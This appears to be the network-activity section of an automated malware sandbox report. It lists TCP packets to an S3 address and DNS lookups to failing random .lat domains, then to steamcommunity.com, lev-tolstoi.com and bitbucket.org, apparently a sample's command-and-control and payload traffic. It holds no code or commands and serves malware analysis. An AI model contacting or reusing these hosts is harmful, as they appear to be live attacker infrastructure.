                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.075387001 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.075421095 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.083239079 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.083307028 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.083318949 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.083359957 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.083372116 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.090985060 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.091047049 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.091057062 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.091113091 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.091114998 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.098917007 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.098978043 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.098999977 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.099006891 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.099037886 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.106626987 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.106704950 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.106710911 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.106719971 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.106760025 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.154723883 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.190483093 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.208952904 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.241353989 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.247265100 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.247335911 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.247364044 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.247385025 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.247397900 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.256030083 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.256083965 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.256118059 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.256125927 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.256140947 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.263798952 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.263847113 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.263883114 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.263891935 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.263916969 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.271503925 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.271554947 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.271579027 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.271585941 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.271606922 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.278799057 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.278841019 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.278877020 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.278887987 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.278903008 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.287595987 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.287645102 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.287666082 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.287673950 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.287708044 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.295414925 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.295464039 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.295492887 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.295500994 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.295514107 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.342201948 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.342214108 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.386885881 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.395829916 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.436008930 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.436032057 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.436057091 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.436100006 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.436125994 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.436125994 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.436163902 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.436186075 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.436187029 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.443684101 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.443721056 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.443780899 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.443788052 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.443805933 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.451538086 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.451558113 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.451611996 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.451620102 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.451689005 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.459376097 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.459419012 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.459462881 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.459470987 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.459486008 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.467540979 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.467611074 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.467643023 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.467649937 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.467677116 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.475465059 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.475513935 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.475567102 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.475575924 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.475588083 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.483163118 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.483221054 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.483259916 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.483267069 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.483304977 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.491048098 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.491113901 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.491163015 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.491169930 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.491182089 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.545350075 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.625402927 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.625900984 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.631448984 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.631481886 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.631540060 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.631561041 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.631577015 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.639271021 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.639329910 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.639353037 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.639359951 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.639373064 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.639399052 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.647948027 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.647991896 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.648030996 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.648034096 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.648046017 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.648072004 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.648092985 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.652142048 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.655710936 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.655750036 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.655801058 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.655806065 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.655818939 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.655843973 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.655863047 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.663016081 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.663042068 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.663094997 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.663103104 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.663139105 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.670754910 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.670798063 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.670844078 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.670851946 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.670866013 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.679502964 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.679548025 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.679579020 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.679586887 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.679653883 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.732851982 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.732868910 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.779715061 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.822635889 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.822658062 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.822690964 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.822721004 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.822725058 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.822741985 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.822767019 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.822783947 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.822946072 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.830960035 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.830993891 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.831028938 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.831036091 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.831074953 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.837759972 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.837809086 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.837836027 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.837842941 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.837871075 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.837884903 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.840266943 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.840311050 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.840341091 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.840348005 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.840384007 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.840399981 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.840431929 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.882781029 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:50.991947889 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:51.349129915 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:51.349159956 CET4434971952.216.41.233192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:51.349178076 CET49719443192.168.2.952.216.41.233
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:51.349185944 CET4434971952.216.41.233192.168.2.9

                                                                                                                                                                                                                                                                                      UDP Packets

                                                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:16.109652996 CET6041053192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:16.247967958 CET53604101.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:16.252298117 CET5910453192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:16.390106916 CET53591041.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:16.395708084 CET6027853192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:16.532548904 CET53602781.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:16.550467014 CET5976953192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:16.689172983 CET53597691.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:16.728178978 CET5691053192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:16.866827965 CET53569101.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:16.868932962 CET5497853192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:17.008411884 CET53549781.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:17.128165960 CET5305653192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:17.265804052 CET53530561.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:17.289699078 CET6033953192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:17.427244902 CET53603391.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:17.433895111 CET5689353192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:17.572777033 CET53568931.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:17.574614048 CET6221253192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:17.712177992 CET53622121.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:20.123106003 CET6301053192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:20.261324883 CET53630101.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:43.642390013 CET6153053192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:43.947336912 CET53615301.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:46.226958036 CET5737153192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:46.596955061 CET53573711.1.1.1192.168.2.9

                                                                                                                                                                                                                                                                                      DNS Queries

                                                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:16.109652996 CET192.168.2.91.1.1.10x8f67Standard query (0)sweepyribs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:16.252298117 CET192.168.2.91.1.1.10xf4c2Standard query (0)grannyejh.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:16.395708084 CET192.168.2.91.1.1.10xc0cfStandard query (0)discokeyus.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:16.550467014 CET192.168.2.91.1.1.10x2ee3Standard query (0)necklacebudi.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:16.728178978 CET192.168.2.91.1.1.10x1b97Standard query (0)energyaffai.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:16.868932962 CET192.168.2.91.1.1.10x388bStandard query (0)aspecteirs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:17.128165960 CET192.168.2.91.1.1.10xf6baStandard query (0)sustainskelet.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:17.289699078 CET192.168.2.91.1.1.10x90ddStandard query (0)crosshuaht.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:17.433895111 CET192.168.2.91.1.1.10x74daStandard query (0)rapeflowwj.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:17.574614048 CET192.168.2.91.1.1.10xfaadStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:20.123106003 CET192.168.2.91.1.1.10xa67Standard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:43.642390013 CET192.168.2.91.1.1.10x171bStandard query (0)bitbucket.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:46.226958036 CET192.168.2.91.1.1.10x91eaStandard query (0)bbuseruploads.s3.amazonaws.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                      DNS Answers

                                                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:16.247967958 CET1.1.1.1192.168.2.90x8f67Name error (3)sweepyribs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:16.390106916 CET1.1.1.1192.168.2.90xf4c2Name error (3)grannyejh.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:16.532548904 CET1.1.1.1192.168.2.90xc0cfName error (3)discokeyus.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:16.689172983 CET1.1.1.1192.168.2.90x2ee3Name error (3)necklacebudi.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:16.866827965 CET1.1.1.1192.168.2.90x1b97Name error (3)energyaffai.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:17.008411884 CET1.1.1.1192.168.2.90x388bName error (3)aspecteirs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:17.265804052 CET1.1.1.1192.168.2.90xf6baName error (3)sustainskelet.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:17.427244902 CET1.1.1.1192.168.2.90x90ddName error (3)crosshuaht.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:17.572777033 CET1.1.1.1192.168.2.90x74daName error (3)rapeflowwj.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:17.712177992 CET1.1.1.1192.168.2.90xfaadNo error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:20.261324883 CET1.1.1.1192.168.2.90xa67No error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:20.261324883 CET1.1.1.1192.168.2.90xa67No error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:43.947336912 CET1.1.1.1192.168.2.90x171bNo error (0)bitbucket.org185.166.143.49A (IP address)IN (0x0001)false
